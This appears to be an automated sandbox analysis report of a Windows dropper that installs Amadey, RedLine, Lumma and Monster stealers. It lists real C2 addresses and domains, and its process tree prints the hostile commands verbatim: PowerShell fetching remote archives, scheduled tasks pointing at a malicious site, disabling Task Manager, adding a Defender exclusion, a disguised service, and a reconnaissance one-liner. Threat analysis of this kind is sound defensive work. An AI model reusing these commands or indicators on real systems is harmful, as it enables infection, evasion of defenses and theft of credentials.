Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 20:25

General

  • Target

    420dbf101de653969cea3a5b5c73c081b14d270e8d7a490504ec3721d2bed989.exe

  • Size

    1.8MB

  • MD5

    c4b472cadf72f721d204376ca243080d

  • SHA1

    e0024256a370eaa31c81b846c40015922a8b2134

  • SHA256

    420dbf101de653969cea3a5b5c73c081b14d270e8d7a490504ec3721d2bed989

  • SHA512

    8a4ef187a5449b0bdf8772436e5de8f14c3bd7a5152094a89c30235e5e91eb5b39ad2f253572e639a4fb80af075951607665d669b1f094183e2196575632e507

  • SSDEEP

    49152:XJul3CCJOFjdoMGAwFrpOOj6UQI2lZyNA0RW:+COOFhoGwT39qZuA

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.27.237:13528

Extracted

Family

lumma

C2

https://parallelmercywksoffw.shop/api

https://liabiliytshareodlkv.shop/api

https://willingyhollowsk.shop/api

https://notoriousdcellkw.shop/api

https://distincttangyflippan.shop/api

https://macabrecondfucews.shop/api

https://conferencefreckewl.shop/api

https://flourhishdiscovrw.shop/api

https://greentastellesqwm.shop/api

https://landdumpycolorwskfw.shop/api

https://stickyyummyskiwffe.shop/api

https://sturdyregularrmsnhw.shop/api

https://barebrilliancedkoso.shop/api

https://lamentablegapingkwaq.shop/api

https://innerverdanytiresw.shop/api

https://standingcomperewhitwo.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 1 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 15 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 9 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\420dbf101de653969cea3a5b5c73c081b14d270e8d7a490504ec3721d2bed989.exe
    "C:\Users\Admin\AppData\Local\Temp\420dbf101de653969cea3a5b5c73c081b14d270e8d7a490504ec3721d2bed989.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4472
      • C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
        "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4812
          • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3828
      • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
        "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
          "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          PID:1872
          • C:\Users\Admin\AppData\Local\Temp\gaayks.exe
            "C:\Users\Admin\AppData\Local\Temp\gaayks.exe"
            5⤵
            • Executes dropped EXE
            PID:3220
            • C:\Users\Admin\AppData\Local\Temp\setup.exe
              setup.exe
              6⤵
              • Executes dropped EXE
              PID:4444
              • C:\Users\Admin\AppData\Local\Temp\setup-d6bae2e094fefc16\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup-d6bae2e094fefc16\setup.exe"
                7⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                PID:1368
                • C:\Windows\system32\winsvc.exe
                  "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-d6bae2e094fefc16\setup.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:5316
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2336
                    • C:\Windows\system32\sc.exe
                      "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
                      10⤵
                      • Launches sc.exe
                      PID:412
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2988
                    • C:\Windows\system32\sc.exe
                      "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
                      10⤵
                      • Launches sc.exe
                      PID:5216
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5684
                    • C:\Windows\system32\sc.exe
                      "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
                      10⤵
                      • Launches sc.exe
                      PID:3592
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3500
                    • C:\Windows\system32\sc.exe
                      "C:\Windows\system32\sc.exe" start winsvc
                      10⤵
                      • Launches sc.exe
                      PID:4468
      • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
        "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:412
      • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
        3⤵
        • Executes dropped EXE
        PID:1824
      • C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
        "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:4964
        • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
          "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:5104
          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
            "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4744
            • C:\Users\Admin\AppData\Local\Temp\1000012001\1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000012001\1.exe"
              5⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              PID:4620
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 352
                6⤵
                • Program crash
                PID:1336
        • C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
          "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
          3⤵
          • Executes dropped EXE
          PID:3788
          • C:\Users\Admin\AppData\Local\Temp\onefile_3788_133634751336111847\stub.exe
            "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1984
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              5⤵
                PID:4264
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                5⤵
                  PID:3544
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic csproduct get uuid
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:812
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist"
                  5⤵
                    PID:4928
                    • C:\Windows\system32\tasklist.exe
                      tasklist
                      6⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3608
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                    5⤵
                    • Hide Artifacts: Hidden Files and Directories
                    PID:4048
                    • C:\Windows\system32\attrib.exe
                      attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                      6⤵
                      • Views/modifies file attributes
                      PID:412
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                    5⤵
                      PID:2544
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                      5⤵
                        PID:5000
                        • C:\Windows\system32\taskkill.exe
                          taskkill /F /IM chrome.exe
                          6⤵
                          • Kills process with taskkill
                          PID:5016
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        5⤵
                          PID:1836
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            6⤵
                            • Enumerates processes with tasklist
                            PID:5152
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                          5⤵
                            PID:752
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe Get-Clipboard
                              6⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5160
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "chcp"
                            5⤵
                              PID:3616
                              • C:\Windows\system32\chcp.com
                                chcp
                                6⤵
                                  PID:5192
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "chcp"
                                5⤵
                                  PID:3912
                                  • C:\Windows\system32\chcp.com
                                    chcp
                                    6⤵
                                      PID:5200
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                    5⤵
                                      PID:5332
                                      • C:\Windows\system32\systeminfo.exe
                                        systeminfo
                                        6⤵
                                        • Gathers system information
                                        PID:5480
                                      • C:\Windows\system32\HOSTNAME.EXE
                                        hostname
                                        6⤵
                                          PID:5940
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic logicaldisk get caption,description,providername
                                          6⤵
                                          • Collects information from the system
                                          PID:5952
                                        • C:\Windows\system32\net.exe
                                          net user
                                          6⤵
                                            PID:5984
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 user
                                              7⤵
                                                PID:6000
                                            • C:\Windows\system32\query.exe
                                              query user
                                              6⤵
                                                PID:6016
                                                • C:\Windows\system32\quser.exe
                                                  "C:\Windows\system32\quser.exe"
                                                  7⤵
                                                    PID:6032
                                                • C:\Windows\system32\net.exe
                                                  net localgroup
                                                  6⤵
                                                    PID:6048
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 localgroup
                                                      7⤵
                                                        PID:6064
                                                    • C:\Windows\system32\net.exe
                                                      net localgroup administrators
                                                      6⤵
                                                        PID:6080
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 localgroup administrators
                                                          7⤵
                                                            PID:6096
                                                        • C:\Windows\system32\net.exe
                                                          net user guest
                                                          6⤵
                                                            PID:6112
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 user guest
                                                              7⤵
                                                                PID:6128
                                                            • C:\Windows\system32\net.exe
                                                              net user administrator
                                                              6⤵
                                                                PID:3568
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user administrator
                                                                  7⤵
                                                                    PID:5124
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic startup get caption,command
                                                                  6⤵
                                                                    PID:3200
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist /svc
                                                                    6⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:5108
                                                                  • C:\Windows\system32\ipconfig.exe
                                                                    ipconfig /all
                                                                    6⤵
                                                                    • Gathers network information
                                                                    PID:2416
                                                                  • C:\Windows\system32\ROUTE.EXE
                                                                    route print
                                                                    6⤵
                                                                      PID:5028
                                                                    • C:\Windows\system32\ARP.EXE
                                                                      arp -a
                                                                      6⤵
                                                                        PID:5204
                                                                      • C:\Windows\system32\NETSTAT.EXE
                                                                        netstat -ano
                                                                        6⤵
                                                                        • Gathers network information
                                                                        PID:5312
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc query type= service state= all
                                                                        6⤵
                                                                        • Launches sc.exe
                                                                        PID:5300
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show state
                                                                        6⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:5284
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show config
                                                                        6⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1188
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                      5⤵
                                                                        PID:5340
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh wlan show profiles
                                                                          6⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          PID:5504
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                        5⤵
                                                                          PID:3464
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic csproduct get uuid
                                                                            6⤵
                                                                              PID:5556
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            5⤵
                                                                              PID:5632
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                6⤵
                                                                                  PID:5272
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:4340
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd /c ins.bat
                                                                              4⤵
                                                                                PID:4964
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                                                                  5⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:2580
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                                                                  5⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:2024
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                                                                                  5⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4208
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                                                                                  5⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1364
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                                                                    6⤵
                                                                                      PID:2432
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                                                                        7⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5544
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                                                                        7⤵
                                                                                        • Modifies registry key
                                                                                        PID:5740
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                                                                        7⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5832
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                                                                        7⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5880
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                                                                                    5⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:5388
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                                                                                    5⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:6012
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /query /TN "Cleaner"
                                                                                    5⤵
                                                                                      PID:5376
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:1608
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    4⤵
                                                                                      PID:1824
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                      4⤵
                                                                                        PID:4164
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4612
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 284
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:2900
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000093001\0x3fg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000093001\0x3fg.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:4084
                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1492
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4620 -ip 4620
                                                                                  1⤵
                                                                                    PID:1420
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1608 -ip 1608
                                                                                    1⤵
                                                                                      PID:4048
                                                                                    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                      1⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:5496
                                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2720
                                                                                    • C:\Windows\system32\winsvc.exe
                                                                                      C:\Windows\system32\winsvc.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      PID:5040
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
                                                                                        2⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Drops file in System32 directory
